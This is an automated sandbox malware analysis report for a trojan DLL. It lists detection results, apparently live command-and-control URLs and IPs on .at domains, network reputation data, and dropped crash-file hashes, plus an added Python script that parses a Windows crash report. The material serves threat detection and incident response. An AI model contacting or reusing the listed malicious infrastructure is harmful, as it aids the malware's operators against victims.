3.0.rundll32.exe.ed0184.1.unpack | 100% | Avira | TR/Kazy.4159236
3.2.rundll32.exe.1080000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
3.0.rundll32.exe.e10000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
0.2.loaddll32.exe.9e0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
3.0.rundll32.exe.e10000.4.unpack | 100% | Avira | HEUR/AGEN.1108767
3.0.rundll32.exe.1080000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
3.2.rundll32.exe.ed0184.1.unpack | 100% | Avira | TR/Kazy.4159236
0.2.loaddll32.exe.700000.0.unpack | 100% | Avira | HEUR/AGEN.1108767

Source | Detection | Scanner | Label
giporedtrip.at | 12% | Virustotal |
habpfans.at | 12% | Virustotal |

Source | Detection | Scanner | Label
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus | 0% | Virustotal |
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus | 0% | Avira URL Cloud | safe
http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk | 0% | Avira URL Cloud | safe
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk | 100% | Avira URL Cloud | malware
http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk | 100% | Avira URL Cloud | malware
http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk | 0% | Avira URL Cloud | safe
http://habpfans.at/ | 100% | Avira URL Cloud | malware
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w | 100% | Avira URL Cloud | malware
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk | 0% | Avira URL Cloud | safe
http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk | 100% | Avira URL Cloud | malware
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8 | 0% | Avira URL Cloud | safe
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk | 100% | Avira URL Cloud | malware
http://31.214.157.187/ | 0% | Avira URL Cloud | safe
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ | 100% | Avira URL Cloud | malware
http://habpfans.at/g | 100% | Avira URL Cloud | malware
http://194214.157.187/ | 0% | Avira URL Cloud | safe
http://www.dhtmlcentral.com/tutorial.asp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
giporedtrip.at | 211.119.84.112 | true | true | | unknown
habpfans.at | 41.41.255.235 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk | true | Avira URL Cloud: safe | unknown
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk | true | Avira URL Cloud: malware | unknown
http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk | true | Avira URL Cloud: malware | unknown
http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk | true | Avira URL Cloud: safe | unknown
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk | true | Avira URL Cloud: safe | unknown
http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk | true | Avira URL Cloud: malware | unknown
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus | loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://habpfans.at/ | loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w | loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8 | loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://31.214.157.187/ | loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ | loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://habpfans.at/g | loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://194214.157.187/ | loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.dhtmlcentral.com/tutorial.asp | loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
181.129.180.251 | unknown | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | true
41.41.255.235 | habpfans.at | Egypt | 8452 | TE-ASTE-ASEG | true
211.119.84.112 | giporedtrip.at | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
31.214.157.187 | unknown | Germany | 58329 | RACKPLACEDE | true
61.36.14.230 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
194.76.226.200 | unknown | Germany | 39378 | SERVINGADE | true
                        IP
                        192.168.2.1
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:560543
                        Start date:26.01.2022
                        Start time:17:02:04
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 43s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:hFGZpat9Mf.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:34
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@6/6@4/7
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 94.6% (good quality ratio 93.1%)
                        • Quality average: 83.4%
                        • Quality standard deviation: 23.8%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 25
                        • Number of non-executed functions: 149
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        • Override analysis time to 240s for rundll32
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 104.208.16.94, 13.107.43.16
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, l-0007.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
17:03:26  API Interceptor  12x Sleep call for process: loaddll32.exe modified
17:03:34  API Interceptor  1x Sleep call for process: WerFault.exe modified
Match            Associated Sample Name / URL  Detection  Context
181.129.180.251  POOA3yOX9U.exe                malicious  amogohuigotuli.at/
                 ZmrIkplkoM.exe                malicious  amogohuigotuli.at/
                 u5Xy31KyGy.exe                malicious  amogohuigotuli.at/
                 q7xmnTDHpF.exe                malicious  rcacademy.at/upload/
                 i8o6qTTaCn.exe                malicious  rcacademy.at/upload/
                 mmL6PoOcBh.exe                malicious  rcacademy.at/upload/
                 RO5C8I46uy.exe                malicious  rcacademy.at/upload/
                 f6Y6Q3u1yu.exe                malicious  amogohuigotuli.at/
                 fd862143z1.exe                malicious  rcacademy.at/upload/
                 Vy8zkg8z8Z.exe                malicious  rcacademy.at/upload/
                 jPda372R5f.exe                malicious  rcacademy.at/upload/
                 IoF1dw1p9z.exe                malicious  rcacademy.at/upload/
                 av7K0AcNsr.exe                malicious  srtuiyhuali.at/
                 4EpcouxNoq.exe                malicious  srtuiyhuali.at/
                 pgOVV6yBlF.exe                malicious  srtuiyhuali.at/
                 uATT8vAUK9.exe                malicious  srtuiyhuali.at/
                 vjdcYcI4Y2.exe                malicious  srtuiyhuali.at/
                 7h6Fk08DNQ.exe                malicious  srtuiyhuali.at/
                 N6y7A7R9wg.exe                malicious  srtuiyhuali.at/
                 dLXl5wO1SJ.exe                malicious  srtuiyhuali.at/
Match           Associated Sample Name / URL  Detection  Context
giporedtrip.at  61ee6edf7de65.dll             malicious  91.203.174.38
Match                         Associated Sample Name / URL  Detection  Context
TE-ASTE-ASEG                  DDYw4c9rsv                    malicious  41.38.213.218
                              3TwimyN0N8                    malicious  41.37.180.30
                              UnHAnaAW.arm7                 malicious  41.37.180.82
                              UnHAnaAW.x86                  malicious  41.32.98.110
                              LK5ARQg60H                    malicious  197.33.36.99
                              keLazmLrKu                    malicious  197.60.156.38
                              CoA2abf5vX                    malicious  41.44.233.248
                              34jU7VJQ0a                    malicious  197.39.177.17
                              uVZuoZ6LRI                    malicious  156.208.176.40
                              l6RBb7Hfo8                    malicious  197.59.229.17
                              y12n2LSmXR                    malicious  197.44.77.166
                              Tsunami.arm7                  malicious  41.239.218.32
                              Tsunami.x86                   malicious  41.44.233.228
                              meerkat.ppc                   malicious  41.233.132.81
                              7ihH3gfA8T.exe                malicious  41.41.255.235
                              Jl0usXeboX                    malicious  41.239.218.71
                              GhEbenpQOu                    malicious  156.223.192.120
                              fB3EW65a8w                    malicious  197.33.36.75
                              UUdqNnOR8m                    malicious  41.36.251.34
                              h7hCeBAb8l                    malicious  41.36.100.75
EPMTelecomunicacionesSAESPCO  w9iS7q4EwN                    malicious  201.184.41.22
                              Jl0usXeboX                    malicious  181.136.190.136
                              ur2NHPuTBS                    malicious  181.134.69.202
                              ZYXESmYwdx                    malicious  181.133.99.212
                              GhEbenpQOu                    malicious  181.134.69.226
                              5n6bA6wC1D                    malicious  181.128.127.203
                              jJboHgATMC                    malicious  181.129.241.192
                              fB3EW65a8w                    malicious  181.128.127.245
                              h7hCeBAb8l                    malicious  190.70.172.240
                              3rR7qVHNMH                    malicious  201.233.201.67
                              V15hQSZlC3                    malicious  190.128.73.12
                              #U3061#U3066#U3082#U3064#U305f#U3044#U30c1#U3059#U30b8.exe  malicious  200.116.199.10
                              78Z6MfiA8T                    malicious  190.29.50.130
                              arm                           malicious  181.128.175.112
                              Y9uHYfBuu4                    malicious  201.184.28.58
                              aqby7XXUj0                    malicious  181.138.92.45
                              hc0B1CYKcL                    malicious  201.190.124.238
                              nF2HOER8Fg                    malicious  201.233.47.198
                              3cNKO2pP2l                    malicious  181.138.79.59
                              koyDvhDnUj                    malicious  181.129.52.110
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9231380421791202
                        Encrypted:false
                        SSDEEP:192:dSiB0oXKHBUZMX4jed+tTN/u7slS274ItWc:civXiBUZMX4jeI5/u7slX4ItWc
                        MD5:2E9E475BBF5C444FDD216D612789DF16
                        SHA1:962AD3179B750CF580262E1907A21695CCCF95CA
                        SHA-256:0064278D09AABB28FEDAF0249EA8CB8FE70CA1E041D4894DCF53040F05E19E31
                        SHA-512:18EBA813F6A28E2B7751BD3001B4482C544F808182C859505F4FBFDC25EAAA2F687261D01906D9337561C1D8F0E8ACC7BD71C9A5A2211592E1F48E8D3637A661
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.7.1.8.9.9.3.2.8.3.8.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.7.1.9.0.1.2.5.8.0.7.2.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.3.8.9.6.b.0.-.5.3.f.3.-.4.c.c.7.-.8.1.1.7.-.7.c.f.5.a.2.3.c.6.8.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.e.b.9.5.e.c.-.d.e.6.2.-.4.7.8.9.-.9.a.2.7.-.4.9.f.7.3.2.8.d.6.c.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.8.-.0.0.0.1.-.0.0.1.6.-.2.4.9.8.-.9.3.a.3.1.9.1.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
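The preview above is the Report.wer that WerFault.exe writes when a process crashes, here the rundll32.exe host of the sample. It is UTF-16LE text (the leading two bytes are the BOM) of CRLF-terminated Key=Value lines, and its EventTime/UploadTime fields are Windows FILETIME values, which is why they read as 18-digit integers rather than dates. The Python below, added here as an example and not part of the Joe Sandbox report, parses that format and converts the timestamps to UTC. The embedded report is reconstructed from the fields visible in the preview only (the truncated TargetAppId is left out); it is a constructed stand-in, not the dropped file itself, and the MACHINE_TYPES table is the standard IMAGE_FILE_MACHINE values that WER stores in Wow64Host/Wow64Guest.

```python
"""Parse the Report.wer that WerFault.exe dropped for the crashing rundll32.exe
host and convert its FILETIME fields to UTC. Added example, not part of the
Joe Sandbox report; the embedded report is reconstructed from the preview
(the fields shown there, nothing beyond them), not the dropped file."""
from datetime import datetime, timedelta, timezone

# Reconstructed from the preview: Report.wer is UTF-16LE with a BOM, CRLF-terminated Key=Value lines.
SAMPLE_REPORT = b"\xff\xfe" + "\r\n".join([
    "Version=1",
    "EventType=APPCRASH",
    "EventTime=132877189932838803",
    "ReportType=2",
    "Consent=1",
    "UploadTime=132877190125807208",
    "ReportStatus=524384",
    "ReportIdentifier=dd3896b0-53f3-4cc7-8117-7cf5a23c6817",
    "IntegratorReportIdentifier=91eb95ec-de62-4789-9a27-49f7328d6ca9",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=rundll32.exe",
    "OriginalFilename=RUNDLL32.EXE",
    "AppSessionGuid=00000cc8-0001-0016-2498-93a31913d801",
    "",
]).encode("utf-16-le")

# IMAGE_FILE_MACHINE_* values WER writes into Wow64Host / Wow64Guest
MACHINE_TYPES = {0x014C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC; keep microsecond precision."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)


def parse_wer(raw):
    """Key=Value pairs of a Report.wer as a dict; the first occurrence of a key wins."""
    fields = {}
    for line in raw.decode("utf-16").splitlines():  # the utf-16 codec consumes the BOM
        if "=" in line:
            key, value = line.split("=", 1)
            fields.setdefault(key.strip(), value.strip())
    return fields


def summarize(raw):
    """What a responder needs from the crash report: what died, when, and its bitness."""
    f = parse_wer(raw)
    event = filetime_to_datetime(f["EventTime"]) if "EventTime" in f else None
    upload = filetime_to_datetime(f["UploadTime"]) if "UploadTime" in f else None
    host = MACHINE_TYPES.get(int(f.get("Wow64Host", "0")), "unknown")
    guest = MACHINE_TYPES.get(int(f.get("Wow64Guest", "0")), "unknown")
    return {
        "event": f.get("EventType"),
        "process": f.get("NsAppName"),
        "event_time_utc": event.isoformat() if event else None,
        "upload_delay_s": (upload - event).total_seconds() if event and upload else None,
        # a 32-bit guest on a 64-bit host is why the report came from SysWOW64\WerFault.exe
        "wow64": host != guest,
        "host_arch": host,
        "guest_arch": guest,
        "report_id": f.get("ReportIdentifier"),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REPORT).items():
        print(f"{key:>15}: {value}")
```

For the values in the preview, EventTime decodes to 2022-01-27 01:03:13 UTC, which lines up with the minidump's "Thu Jan 27 01:03:17 2022" below it and with the 17:03:34 WerFault.exe entry in the sandbox timeline (the minidump carries "Pacific Standard Time", so the report's 17:0x local times are 01:0x UTC on the 27th). Wow64Host 34404 (0x8664) against Wow64Guest 332 (0x14C) records a 32-bit rundll32.exe crashing on a 64-bit host.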
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 27 01:03:17 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):50394
                        Entropy (8bit):2.1230258138964713
                        Encrypted:false
                        SSDEEP:192:v7u7354xKvI2O5Skb+XKD74zz7hFK/dDBRvU0SF9Dq0Awi/Y4p:/oQB5Lb+XKIzz7hFadDBR8xFpq0Awi/
                        MD5:E557B9E94120C75B30455B3AB7BB4F67
                        SHA1:2816C199A296B247FADBC24CB7248059CC2AA728
                        SHA-256:A0FB0FDB2F46849AE8FFCCB0F6830134282C4BEF5375EC4B3328CA9957E8FC78
                        SHA-512:1B07B0D1CC742AB0398A7C0CF12C6A6D4AD57568006FC2B39D05E84E9B93F969C117C21CCF5CC366B21403FCE10D970DE56DAA1951B4037F3A93066D91297D33
                        Malicious:false
                        Reputation:low
                        Preview:MDMP....... .......U..a....................................d..../..........T.......8...........T...........@...............`...........L....................................................................U...........B..............GenuineIntelW...........T...........H..a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8312
                        Entropy (8bit):3.6976983898128415
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNips6rRf+Z46YBgah6TgmfTNSOCprR689bW4sfcSm:RrlsNiy6Ff246YBb6TgmfTNSHDWrfI
                        MD5:1F0DCAF8CAD8216C2681E359FDB9FC32
                        SHA1:F83B65FE0F97B36C53DEA67EF86D390C5F2E4874
                        SHA-256:C48C34B58275C8586BA05F0DE058403E5D4BEF7A7489275B5971858A1B1B65DA
